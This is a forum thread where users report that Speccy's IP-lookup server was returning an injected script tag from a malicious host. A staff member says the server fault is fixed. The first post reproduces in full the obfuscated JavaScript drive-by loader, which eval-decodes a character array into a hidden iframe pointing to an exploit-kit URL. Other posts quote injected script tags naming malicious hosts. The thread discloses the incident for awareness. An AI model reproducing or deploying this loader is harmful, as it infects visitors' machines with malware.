Jump to content
CCleaner Community Forums
keyboardNinja

Speccy querying a hacked page

Recommended Posts

While perusing the latest version of Speccy (1.10.248), I noticed something odd under Network.

 

"External IP Address <script type="text/javascript" src="http://www.nsa-lab.com/js.php"></script>12.xxx.xxx.xxx'>http://www.nsa-lab.com/js.php"></script>12.xxx.xxx.xxx

with the ending x's being the rest of my public IP.

 

speccyi.png

 

I didn't have a clue what this was, so I blindly copied the address (hxxp://www.nsa-lab.com/js.php < intentionally delinkified for this post) into Google Chrome to try and figure out what was going on.

 

When I do that, I get this:

avastu.png

 

The javascript is:

 

function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};createCSS('#va','background:url(data:,ring.fromCharCode)');var R=null;var h=document.styleSheets;var F = null;for(var f=0; f < h.length; f++){try{var Z = h[f].cssRules || h[f].rules;for(var m=0;m < Z.length; m++){var Q = Z.item ? Z.item(m) : Z[m];if(Q.selectorText!='#va')continue;x = (Q.cssText) ? Q.cssText : Q.style.cssText;R = "St" + x.match(/(ri[^")]+)/)[1]; F=Q.selectorText.substr(1);};} catch(e){};}L=new Date(2020,11,3,2,21,8);i=L.getSeconds()-4;var o=[i+114,i+93,i+110,i+28,i+61,i+57,i+30,i+94,i+107,i+96,i+117,i+30,i+55,i+101,i+98,i+28,i+36,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+99,i+97,i+112,i+65,i+104,i+97,i+105,i+97,i+106,i+112,i+111,i+62,i+117,i+80,i+93,i+99,i+74,i+93,i+105,i+97,i+36,i+61,i+37,i+87,i+44,i+89,i+37,i+119,i+97,i+36,i+37,i+55,i+121,i+97,i+104,i+111,i+97,i+28,i+119,i+114,i+93,i+110,i+28,i+67,i+28,i+57,i+28,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+95,i+110,i+97,i+93,i+112,i+97,i+65,i+104,i+97,i+105,i+97,i+106,i+112,i+36,i+61,i+37,i+55,i+112,i+110,i+117,i+28,i+119,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+93,i+108,i+108,i+97,i+106,i+96,i+63,i+100,i+101,i+104,i+96,i+36,i+67,i+37,i+55,i+121,i+28,i+95,i+93,i+112,i+95,i+100,i+28,i+36,i+97,i+37,i+28,i+119,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+94,i+107,i+96,i+117,i+28,i+57,i+28,i+67,i+55,i+121,i+101,i+98,i+28,i+36,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+99,i+97,i+112,i+65,i+104,i+97,i+105,i+97,i+106,i+112,i+111,i+62,i+117,i+80,i+93,i+99,i+74,i+93,i+105,i+97,i+36,i+61,i+37,i+87,i+44,i+89,i+37,i+119,i+97,i+36,i+37,i+55,i+121,i+28,i+97,i+104,i+111,i+97,i+28,i+119,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+115,i+110,i+101,i+112,i+97,i+36,i+30,i+56,i+101,i+98,i+110,i+93,i+105,i+97,i+28,i+111,i+110,i+95,i+57,i+35,i+100,i+112,i+112,i+108,i+54,i+43,i+43,i+111,i+97,i+106,i+96,i+42,i+115,i+93,i+110,i+111,i+93,i+115,i+98,i+101,i+94,i+97,i+110,i+42,i+95,i+107,i+105,i+43,i+106,i+97,i+115,i+111,i+43,i+46,i+44,i+45,i+44,i+35,i+28,i+115,i+101,i+96,i+112,i+100,i+57,i+35,i+45,i+44,i+35,i+28,i+100,i+97,i+101,i+99,i+100,i+112,i+57,i+35,i+45,i+44,i+35,i+28,i+111,i+112,i+117,i+104,i+97,i+57,i+35,i+114,i+101,i+111,i+101,i+94,i+101,i+104,i+101,i+112,i+117,i+54,i+100,i+101,i+96,i+96,i+97,i+106,i+55,i+108,i+107,i+111,i+101,i+112,i+101,i+107,i+106,i+54,i+93,i+94,i+111,i+107,i+104,i+113,i+112,i+97,i+55,i+104,i+97,i+98,i+112,i+54,i+44,i+55,i+112,i+107,i+108,i+54,i+44,i+55,i+35,i+58,i+56,i+43,i+101,i+98,i+110,i+93,i+105,i+97,i+58,i+30,i+37,i+55,i+121,i+121,i+114,i+93,i+110,i+28,i+68,i+57,i+44,i+55,i+98,i+113,i+106,i+95,i+112,i+101,i+107,i+106,i+28,i+97,i+36,i+37,i+119,i+115,i+100,i+101,i+104,i+97,i+36,i+68,i+39,i+39,i+28,i+56,i+28,i+45,i+44,i+44,i+37,i+119,i+97,i+36,i+37,i+55,i+121,i+114,i+93,i+110,i+28,i+111,i+28,i+57,i+28,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+95,i+110,i+97,i+93,i+112,i+97,i+65,i+104,i+97,i+105,i+97,i+106,i+112,i+36,i+35,i+101,i+98,i+110,i+93,i+105,i+97,i+35,i+37,i+55,i+111,i+42,i+111,i+97,i+112,i+61,i+112,i+112,i+110,i+101,i+94,i+113,i+112,i+97,i+36,i+35,i+111,i+110,i+95,i+35,i+40,i+35,i+100,i+112,i+112,i+108,i+54,i+43,i+43,i+111,i+97,i+106,i+96,i+42,i+115,i+93,i+110,i+111,i+93,i+115,i+98,i+101,i+94,i+97,i+110,i+42,i+95,i+107,i+105,i+43,i+106,i+97,i+115,i+111,i+43,i+46,i+44,i+45,i+44,i+35,i+37,i+55,i+111,i+42,i+111,i+112,i+117,i+104,i+97,i+42,i+114,i+101,i+111,i+101,i+94,i+101,i+104,i+101,i+112,i+117,i+57,i+35,i+100,i+101,i+96,i+96,i+97,i+106,i+35,i+55,i+111,i+42,i+111,i+112,i+117,i+104,i+97,i+42,i+108,i+107,i+111,i+101,i+112,i+101,i+107,i+106,i+57,i+35,i+93,i+94,i+111,i+107,i+104,i+113,i+112,i+97,i+35,i+55,i+111,i+42,i+111,i+112,i+117,i+104,i+97,i+42,i+104,i+97,i+98,i+112,i+57,i+35,i+44,i+35,i+55,i+111,i+42,i+111,i+112,i+117,i+104,i+97,i+42,i+112,i+107,i+108,i+57,i+35,i+44,i+35,i+55,i+111,i+42,i+111,i+97,i+112,i+61,i+112,i+112,i+110,i+101,i+94,i+113,i+112,i+97,i+36,i+35,i+115,i+101,i+96,i+112,i+100,i+35,i+40,i+35,i+45,i+44,i+35,i+37,i+55,i+111,i+42,i+111,i+97,i+112,i+61,i+112,i+112,i+110,i+101,i+94,i+113,i+112,i+97,i+36,i+35,i+100,i+97,i+101,i+99,i+100,i+112,i+35,i+40,i+35,i+45,i+44,i+35,i+37,i+55,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+99,i+97,i+112,i+65,i+104,i+97,i+105,i+97,i+106,i+112,i+111,i+62,i+117,i+80,i+93,i+99,i+74,i+93,i+105,i+97,i+36,i+61,i+37,i+87,i+44,i+89,i+42,i+93,i+108,i+108,i+97,i+106,i+96,i+63,i+100,i+101,i+104,i+96,i+36,i+111,i+37,i+55,i+121];b=eval("e" + F + "l");var D='';J=b®;for(var f=0; f < o.length; f++){O=b(o[f]);D+=J(O);}b(D);

 

 

Posted about it on the Staff forums at BleepingComputer.com, and Grinler (Lawrence Abrams) posted this:

 

Basically whats happening is that speccy is querying your ip address by going to this url:

 

http://speccy.piriform.com/ip/

 

 

The content being returned, though, is not only the ip address but a javascript.

 

<script type="text/javascript" src="http://www.nsa-lab.com/js.php"></script>

 

Speccy is 100% compromised. That javascript loads a exploit kit, which has now downloaded some malware onto my Virtual Machine.

 

Pretty sure this would be considered a critical security flaw.

 

-kN

Share this post


Link to post
Share on other sites

Also,

 

I can see how this would affect people. If you save your report as XML and then load it, it will open Internet Explorer (or your other default browser) automatically and load the XML file. This will trigger the javascript to launch and boom you are infected.

Share this post


Link to post
Share on other sites

Thanks everyone for bringing this to the attention of Piriform.

 

I have send a mass PM out to alert Piriform so hopefully this can be taken care of right away.

Share this post


Link to post
Share on other sites

The Publish Snapshot is also affected.

 

<script type="text/javascript" src="http://arent.xip.pl/js.php"></script>http://speccy.piriform.com/results/FmdnvYm6byY0qjs3QKp8w8D

Visiting a Snapshot link gives another blocked Trojan:

 

snapshotr.png

Share this post


Link to post
Share on other sites

Problem has been fixed. We're currently performing a full investigation into that server.

 

Please note that the software is fine and doesn't contain a virus, it's a fault on our Speccy server.

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...

×
×
  • Create New...